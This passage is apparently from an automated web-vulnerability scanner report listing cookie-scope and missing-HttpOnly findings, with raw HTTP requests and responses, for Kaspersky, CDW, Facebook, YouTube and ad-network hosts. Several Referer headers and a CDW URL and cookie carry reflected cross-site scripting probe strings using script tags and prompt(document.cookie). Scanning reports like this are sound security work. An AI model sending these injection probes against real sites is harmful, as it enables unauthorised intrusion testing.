Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: pluto2=308875122887; pluto=308875122887
Cache-Control: max-age=0

Response

HTTP/1.1 302 Redirect
Date: Sun, 04 Sep 2011 12:27:23 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=bPTbCOiGrgEQmpS17AM&guid=ON&script=0
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: pluto=308875122887; domain=.fastclick.net; path=/; expires=Tue, 03-Sep-2013 12:27:23 GMT

9.37. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=HnYOrcty_vvEh0MLtT8RYg; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Sun, 04 Sep 2011 14:02:03 GMT
Date: Sun, 04 Sep 2011 14:02:03 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: S=photos_html=HnYOrcty_vvEh0MLtT8RYg; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

9.38. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1315139242; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 12:27:22 GMT
mt_mop=10008:1315139190|2:1315139242|5:1315061038|4:1313678521|10001:1312768945|10002:1313678517; domain=.mathtag.com; path=/; expires=Tue, 04-Oct-2011 12:27:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/img?mt_id=106487&mt_adid=101148&v1=&v2=&v3=&s1=&s2=&s3=&ord=657203058 HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315139190; mt_mop=10008:1315139190|5:1315061038|10002:1313678517|4:1313678521|10001:1312768945

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca7 3239
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 12:27:22 GMT
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=296&custom_uuid=4e394470-3e17-879f-6d77-411115d4b5ad&expiration=28days
Connection: Keep-Alive
Set-Cookie: ts=1315139242; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 12:27:22 GMT
Set-Cookie: mt_mop=10008:1315139190|2:1315139242|5:1315061038|4:1313678521|10001:1312768945|10002:1313678517; domain=.mathtag.com; path=/; expires=Tue, 04-Oct-2011 12:27:22 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

9.39. http://pto.digitalriver.com/trial/646/p/kaspersky_us_storepage.962/15/content.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pto.digitalriver.com
Path:	/trial/646/p/kaspersky_us_storepage.962/15/content.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

op646kaspersky_us_storepageliid=a01603h08f2794q05t5gjbb0d; expires=Mon, 05-Sep-11 12:25:17 GMT; path=/; domain=.digitalriver.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trial/646/p/kaspersky_us_storepage.962/15/content.js?D_ts=1315139067&D_tzo=300&D_loc=http%3A//usa.kaspersky.com/store/kaspersky-store&D_ckl=535&D_ref=http%3A//usa.kaspersky.com/%3Fdomain%3Dkapersky.com HTTP/1.1
Host: pto.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011

Response

HTTP/1.1 200 OK
P3P: CP="DEV IND NOI OTC OUR PSA PSD"
Content-Type: application/x-javascript
Vary: Accept-Encoding
Server: Fast
Expires: Sun, 04 Sep 2011 12:25:17 GMT
Pragma: no-cache
Date: Sun, 04 Sep 2011 12:25:17 GMT
Content-Length: 7025
Connection: close
Set-Cookie: op646kaspersky_us_storepageliid=a01603h08f2794q05t5gjbb0d; expires=Mon, 05-Sep-11 12:25:17 GMT; path=/; domain=.digitalriver.com
Cache-Control: max-age=0, no-cache, no-store

function opCreativeSetCookieA(n, v, d, e){var de = new Date;de.setTime(de.getTime() + e * 1000);document.cookie = n + "=" + escape(v) + ((e==null) ? "" : ("; expires=" + de.toGMTString())) + "; path=/
...[SNIP]...

9.40. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Tue, 03-Sep-2013 12:47:25 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=9af5e269-ffc3-60ee-513f-0d7cb918982a&rtb=y9dly9jlztlwn HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; p=1315103786

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:47:25 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Tue, 03-Sep-2013 12:47:25 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.41. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=6981940571811189480; Domain=.turn.com; Expires=Fri, 02-Mar-2012 12:19:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=hAU1xLXvC1e1OeD2CBQel81SsDNw1x8ENZFWJu5tZYvHPLiQlJy63adscYoXGrmdQRvgP0ZUtl82Uz5_iH0tdA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Fri, 02-Mar-2012 12:19:01 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=711442&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 12:19:00 GMT

9.42. http://reservoir.marketstudio.net/reservoir previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reservoir.marketstudio.net
Path:	/reservoir

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Mon, 09-Sep-2030 00:56:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reservoir?d=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2Fhtml%2FpbPage.Homepage%3Fresid%3D__RESID__%26rests%3D1315145806740&t=commerce&p=globalcommerce&p1=digriv&p2=38938839926&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 14:17:36 GMT
Server: Apache
X-Server-Name: resweb@dc1web54
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Mon, 09-Sep-2030 00:56:36 GMT
Location: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://corporate.digitalriver.com/store/digriv/
...[SNIP]...

9.43. http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; Domain=.techtarget.com; Path=/
referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; Domain=.techtarget.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise HTTP/1.1
Host: searchsecurity.techtarget.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

9.44. http://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.adinterax.com
Path:	/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adxid=013eab4e638f435a; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
adxf=3059920@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:46:27 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxid=013eab4e638f435a; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Set-Cookie: adxf=3059920@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.45. http://www.blogger.com/comment-iframe.g previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blogger.com
Path:	/comment-iframe.g

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=blogger=MRgQ-9V12L9mw4tTYIuyxg; Domain=.blogger.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.46. http://www.cdw.com/TabStatus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/TabStatus.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

3039D25F6DEC4E47B474C3FC71519575=A8A8F83D13EA4F8B917AA5F211762060=75165C11D5234F7D9CF742C32889F929&BA9AA5C91598458BA251A10B273627B6=A04B0B4F3A184E6F9B2F6C8FA16E6CB4&813F9F7AA3924BBEB886AA375A9E8321=&925E59B88B6B46AEB9CB495BFF4D7D2C=&806B512B4E7948E3A3481CCA3CB230A5=&ECDC4F474BB24C7FB7CF910AF2E97643=%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF%261d6ea%2522%253e%253cscript%253eprompt%2528document.location%2529%253c%252fscript%253ed7742b51610%3d1; domain=.cdw.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TabStatus.aspx?Tab=ShopCDW&URL=%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF%261d6ea%2522%253E%253Cscript%253Eprompt(document.location)%253C%2fscript%253Ed7742b51610%3d1 HTTP/1.1
Host: www.cdw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx?1d6ea%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Ed7742b51610=1
Cookie: 3039D25F6DEC4E47B474C3FC71519575=A8A8F83D13EA4F8B917AA5F211762060=75165C11D5234F7D9CF742C32889F929&BA9AA5C91598458BA251A10B273627B6=A04B0B4F3A184E6F9B2F6C8FA16E6CB4&813F9F7AA3924BBEB886AA375A9E8321=&925E59B88B6B46AEB9CB495BFF4D7D2C=&806B512B4E7948E3A3481CCA3CB230A5=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43
Content-Type: image/gif
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI FIN COM NAV INT STA",
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:57:28 GMT
Connection: close
Set-Cookie: 3039D25F6DEC4E47B474C3FC71519575=A8A8F83D13EA4F8B917AA5F211762060=75165C11D5234F7D9CF742C32889F929&BA9AA5C91598458BA251A10B273627B6=A04B0B4F3A184E6F9B2F6C8FA16E6CB4&813F9F7AA3924BBEB886AA375A9E8321=&925E59B88B6B46AEB9CB495BFF4D7D2C=&806B512B4E7948E3A3481CCA3CB230A5=&ECDC4F474BB24C7FB7CF910AF2E97643=%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF%261d6ea%2522%253e%253cscript%253eprompt%2528document.location%2529%253c%252fscript%253ed7742b51610%3d1; domain=.cdw.com; path=/

GIF89a.............!.......,...........D..;

9.47. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 14:06:38 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 14:06:38 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.216.49
Connection: close
Date: Sun, 04 Sep 2011 14:06:38 GMT
Content-Length: 0

9.48. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.222.56
Connection: close
Date: Sun, 04 Sep 2011 14:06:40 GMT
Content-Length: 0

9.49. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GEO=4bd7a9240837a3fe79724fae6a6e6711cwsAAAAzVVMyF3tqTmOIRA==; path=/; domain=.youtube.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:16:36 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=4bd7a9240837a3fe79724fae6a6e6711cwsAAAAzVVMyF3tqTmOIRA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

10. Cookie without HttpOnly flag set previous next
There are 90 instances of this issue:

http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
http://event.adxpose.com/event.flow
http://forum.kaspersky.com/index.php
http://forum.kaspersky.com/index.php
http://login.dotomi.com/ucm/UCMController
http://support.kasperskyamericas.com/corporate/contact-information%20O
http://t2.trackalyzer.com/trackalyze.asp
http://www.amazon.com/s/
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/z/i.cid
http://action.media6degrees.com/orbserv/hbpix
http://ad.yieldmanager.com/pixel
http://ads.pointroll.com/PortalServe/
https://adwords.google.com/um/StartNewLogin
http://amch.questionmarket.com/adsc/d921286/4/931683/adscout.php
http://amch.questionmarket.com/adscgen/dynamiclink.js.php
http://api.twitter.com/1/SCMagazineAU/lists/infosec/statuses.json
https://api.twitter.com/1/statuses/user_timeline.json
http://apis.google.com/js/plusone.js
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/recruitBeacon.pli
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://b.voicefive.com/p
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://buy.norton.com/ps_ant_de_de_eset
http://clk.atdmt.com/MRT/go/341816816/direct
http://clk.atdmt.com/go/262448070/direct
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/home_repl_1.jpg
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/ce.jpg
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/games.jpg
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif
http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg
http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js
http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js
http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js
http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css
http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js
http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
http://corsec.com/index.php
http://devirusare.com/x26amp
http://forms.maas360.com/go/fiberlink/webinar_iPhone_HS
http://go.techtarget.com/clicktrack-r/activity/activity.gif
http://idcs.interclick.com/Segment.aspx
http://idgenterprise.112.2o7.net/b/ss/computerworldcom/1/H.20.3/s25338357510045
http://kaplab.netmng.com/pixel/
http://leadback.advertising.com/adcedge/lb
http://leadback.advertising.com/adcedge/lb
http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif
http://media.fastclick.net/w/tre
http://media.techtarget.com/digitalguide/images/Editorial/mmimoso-sm.jpg
http://media.techtarget.com/rms/ux/javascript/jquery-1.3.2.min.js
http://nir.theregister.co.uk/
http://pixel.mathtag.com/event/img
http://pto.digitalriver.com/trial/646/p/kaspersky_us_storepage.962/15/content.js
http://r.openx.net/set
http://r.turn.com/r/beacon
http://recs.richrelevance.com/rrserver/p13n_generated.js
http://reservoir.marketstudio.net/reservoir
http://rotation.linuxnewmedia.com/www/delivery/ajs.php
http://rotation.linuxnewmedia.com/www/delivery/avw.php
http://rotation.linuxnewmedia.com/www/delivery/ck.php
http://rotation.linuxnewmedia.com/www/delivery/lg.php
http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
http://sophelle.app5.hubspot.com/salog.js.aspx
http://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif
http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php
http://www.blogger.com/reviews/json/aggregates
http://www.cdw.com/TabStatus.aspx
http://www.cfoworld.com/
http://www.cio.com/
http://www.csoonline.com/
http://www.etracker.de/cnt.php
http://www.itworld.com/
http://www.kaspersky.com/images/newdesign/arabic.gif
http://www.kaspersky.com/images/newdesign/china.gif
http://www.kaspersky.com/images/newdesign/japan.gif
http://www.kaspersky.com/images/newdesign/korea.gif
http://www.kaspersky.com/images/newdesign/russia.gif
http://www.qualys.com/forms/trials/qualysguard_freescan_landing/
http://www.youtube.com/results

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

